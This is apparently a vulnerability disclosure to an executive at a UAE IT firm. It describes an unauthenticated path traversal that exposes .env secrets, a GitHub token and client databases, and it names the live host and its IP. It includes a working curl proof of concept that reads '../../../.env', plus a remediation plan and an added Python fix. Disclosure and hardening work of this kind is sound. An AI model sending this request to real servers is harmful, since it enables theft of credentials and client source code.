Security Advisory
Confidential — For the recipient only
Active vulnerability
Independent Security Research · April 2026

Your source code was stolen in under 5 minutes.

No login. No skills. One HTTP request. The technology partner you trust with your government and enterprise systems is leaking every password, every client record, and the source code of 129 private repositories — including yours.

This document has been prepared for you personally as the responsible executive. No data was exfiltrated, modified, or disclosed to any third party. Evidence is retained solely to demonstrate impact and is available on request.

Your personal exposure

Two of your own repositories are in this breach.

The recovered GitHub access token has write permission. An attacker can push modified code back into your repositories without triggering any alert. This is not a theoretical risk — the token was valid at the time of this report.

Source: .git/config file, readable without authentication.

github.com/xtremeitservices · 129 private repositories · connected

  • xtremeitservices/aaz-dashboard (2023-04-05) · yours
  • xtremeitservices/aaz-frontend (2023-04-04) · yours
  • xtremeitservices/galadaribrothersclient
  • xtremeitservices/kawasakiuaeclient
  • xtremeitservices/mazdauaeclient
  • xtremeitservices/emiratevisa-backendclient
  • xtremeitservices/emiratevisa-frontendclient
  • xtremeitservices/motomoriniclient
  • xtremeitservices/kingfisherclient
  • xtremeitservices/Omodaclient
  • xtremeitservices/galadarirealestateclient
  • xtremeitservices/Signa365-Webproduct
  • xtremeitservices/Signa365-APIproduct
  • xtremeitservices/TAccounts-BEproduct
  • … and 115 more private repositories

By the numbers

One vulnerability. Everything exposed.

  • 129 private repositories with write access
  • 59 databases under full root control
  • 8+ production applications compromised
  • < 5 min from first request to full compromise, start to finish
  • 6 live third-party API keys (DeepSeek, Stripe, Azure…)

Whose data is in the breach

This is not just about one company.

The 129 private repositories contain source code, credentials, and production data belonging to the following clients — alongside your own.

  • You: Ahmed Al Zarouni (aaz.ae · aaz-dashboard · aaz-frontend)
  • Enterprise: Galadari Brothers (Real estate · Policies · Careers)
  • Automotive: Kawasaki UAE (Dashboard + web)
  • Automotive: Mazda UAE (Web + mobile + tablet)
  • Government: Emirates Visa (Backend + frontend)
  • Automotive: Moto Morini (Backend + website)
  • Automotive: Omoda UAE (Web app)
  • Hospitality: Kingfisher (Web + dashboard)
  • SaaS product: Signa365 (Document signing · Web/API/Outlook)
  • SaaS product: TAccounts (Invoice · proposal engine)
  • Events: Lynk · 7D Events (Event management)
  • And more: +117 repositories and client projects

Business risk

What this costs if it becomes public.

Financial

  • UAE PDPL 2021: fines up to AED 5,000,000 per violation. Multiple tenants × multiple violations.
  • Active Stripe merchant credentials — payment fraud risk on the merchant account.
  • Leaked AI API keys (verified active) billed to the owner until noticed.
  • Incident response, forensics, and full platform rebuild cost.

Legal & Compliance

  • UAE Federal Decree-Law 45/2021 (Personal Data Protection) — notification duty to the UAE Data Office.
  • Breach of confidentiality and data-handling clauses in every client contract.
  • Civil exposure from enterprise clients (Galadari, Kawasaki, Mazda).
  • If PCI-adjacent data is in any database: PCI DSS reportable event.

Reputational

  • Your public position — Head of IT & Information Security — makes this particularly sensitive.
  • Enterprise clients will learn their source code is in attacker hands.
  • Every future AAZ product becomes a supply-chain question.
  • Media exposure risk is high — a breach of this breadth rarely stays quiet.

Attacker capabilities — right now

What anyone with this vulnerability can do, today.

1. Impersonate your developers on GitHub
   Push modified code into any of your 129 repositories. Backdoors shipped through your normal deployment pipeline.

2. Read, modify, or delete every client database
   59 databases under one root password. Client records, password hashes, invoices, policy documents.

3. Send email as your domains
   Credentialed access to SMTP, Resend, and SMTP2GO. Pixel-perfect phishing to your clients, from your own infrastructure.

4. Forge a logged-in session for any user
   JWT secrets and Laravel application keys are leaked. An attacker can authenticate as any administrator without knowing their password.

5. Spend your money on AI and cloud
   Live keys to DeepSeek AI, Azure Storage, Stripe, MagicHour. Billable at your account until the card maxes or someone notices.

6. Stay invisible
   There is no logging, no alerting, no SIEM. A quiet attacker could have been inside for months — and we cannot prove they were not.

How it unfolds

One request. Everything falls.

A single unauthenticated HTTP request reads any file on the server. From there, every subsequent compromise is automatic.

Step 1 — entry: one HTTP request. No login, no credentials, no skill required.

  POST /public/api/download-file
  {"path":"../../../.env"}

What that single request unlocks:

  • All application secrets: 8+ .env files, every password
  • Database root access: 59 databases, full control
  • GitHub write token: 129 private repos, push access
  • Cloud storage keys: Azure Blob, all customer files
  • Payment API: Stripe merchant access
  • Email infrastructure: SMTP, Resend, SMTP2GO
  • AI services: DeepSeek, MagicHour billing
  • Session forgery: log in as any user, anywhere

What to do

A three-horizon response.

A pragmatic sequence — most impact first, structural fixes after the fire is out.

Today — hours

Stop the bleeding

  1. Disable the vulnerable endpoint on bc.techfirm.ae.
  2. Revoke the exposed GitHub token. Attacker currently has write access.
  3. Rotate MySQL root and all 8+ application database passwords.
  4. Rotate every leaked third-party API key (Stripe, Azure, DeepSeek, Resend, SMTP2GO).
  5. Block public access to phpMyAdmin.

This week

Contain and investigate

  1. GitHub audit log: every clone and push since 2023-04-04.
  2. Force password reset for users of all 8+ applications.
  3. Re-issue all JWT secrets and Laravel APP_KEY values.
  4. Engage incident response if there is any indicator of actual exploitation.
  5. Assess notification duty under UAE PDPL with legal counsel.

This month

Rebuild on solid ground

  1. Retire CentOS 7 (end of life since June 2024). No security patches for 22 months.
  2. Move applications into isolated containers — no more shared filesystem.
  3. Adopt a secret manager (Vault, AWS Secrets Manager). Stop shipping .env files to production servers.
  4. Mandatory external security review before any AAZ-adjacent product returns to the public internet.
  5. Basic SOC/SIEM so a future compromise does not go unnoticed.

For your security team
Technical evidence — proof of concept & sample leaked credentials
proof-of-concept.sh
# One request. No authentication.
curl -s 'https://bc.techfirm.ae/public/api/download-file' \
  -X POST \
  -H 'Content-Type: application/json' \
  -d '{"path":"../../../.env"}'

# Returns the full application .env file with DB credentials,
# mail passwords, and the Laravel APP_KEY.
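The hardened counterpart to the request above, as an added example (Python, not code from the advisory or from the affected Laravel application): the containment check a file-download endpoint needs so that a body such as {"path":"../../../.env"} is refused before any file is opened. The download root is an assumed value; the reason strings are illustrative.

```python
import json
from pathlib import Path, PurePosixPath
from typing import Optional, Tuple

# Assumed download directory; the real endpoint's storage layout is not in the advisory.
DOWNLOAD_ROOT = Path("/var/www/app/storage/downloads")


def resolve_download(requested: str, root: Path = DOWNLOAD_ROOT) -> Tuple[Optional[Path], Optional[str]]:
    """Return (path, None) if the file may be served, otherwise (None, reason).

    Order of checks: empty or NUL-containing input, absolute paths, any '..' or
    dot-prefixed segment (so '.env' and '.git/config' can never be served), and
    finally that the canonical path is still inside root. Only the last check is
    strictly required; the others refuse obvious cases early and yield the
    reason string that belongs in the audit log.
    """
    if not requested or "\x00" in requested:
        return None, "empty-or-nul"
    rel = PurePosixPath(requested)
    if rel.is_absolute():
        return None, "absolute-path"
    if any(part.startswith(".") for part in rel.parts):
        return None, "traversal-or-dotfile"
    base = root.resolve()
    candidate = (base / rel).resolve()      # canonicalises symlinks as well as '..'
    try:
        candidate.relative_to(base)         # raises if candidate is outside base
    except ValueError:
        return None, "escaped-root"
    return candidate, None


def handle_download(body: str) -> Tuple[int, str]:
    """Mirror of the JSON endpoint: {"path": "..."} in, HTTP status and message out."""
    try:
        path = json.loads(body).get("path")
    except (ValueError, AttributeError):
        return 400, "malformed body"
    if not isinstance(path, str):
        return 400, "path must be a string"
    resolved, reason = resolve_download(path)
    if resolved is None:
        return 403, f"refused: {reason}"    # log reason and client; do not echo the input
    return 200, f"serving {resolved.name}"


if __name__ == "__main__":
    # Constructed requests: the advisory's payload beside a legitimate one.
    for body in ('{"path":"../../../.env"}', '{"path":"reports/q1.pdf"}'):
        print(body, "->", handle_download(body))
```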
Sample leaked credentials (masked)

  • MySQL root: b•••••••••••d (12 chars)
  • GitHub PAT: ghp_••••••••••••••••••••••••••••••••••••• (40 chars)
  • DeepSeek AI: sk-•••••••••••••••••••••••••••••• (35 chars)
  • Azure Storage: ••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• (88 chars, base64)
  • Stripe: sk_test_••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• (107 chars)
  • Resend: re_•••••••••••••••••••••••••••••••••• (35 chars)
  • Laravel APP_KEY: base64:•••••••••••••••••••••••••••••••••••••••••••= (44 chars, base64)

Full, unmasked values are retained exclusively by the researcher and provided on request via a secure channel.

Infrastructure at a glance

  • Server: 185.224.139.208
  • Operating system: CentOS 7 (EOL)
  • PHP / OpenSSL: 7.2 / 1.0.2k (EOL)
  • Admin panels public: 2031, 2083, 2087, 2096
  • PostgreSQL public: port 5432
  • Anonymous FTP: enabled
  • Tenant isolation: none

Findings summary

  • CRIT  Path traversal (unauth)
  • CRIT  phpMyAdmin credential leak
  • CRIT  Cross-tenant secret exposure
  • CRIT  Shared-hosting compromise
  • CRIT  GitHub PAT exposure
  • CRIT  MySQL root access
  • HIGH  Active 3rd-party API keys
  • MED   FastAPI docs exposed (116)
  • MED   Open registration (Signa365)

Full 1,000-line technical report (reproduction steps, remediation code, CVSS scores) available on request.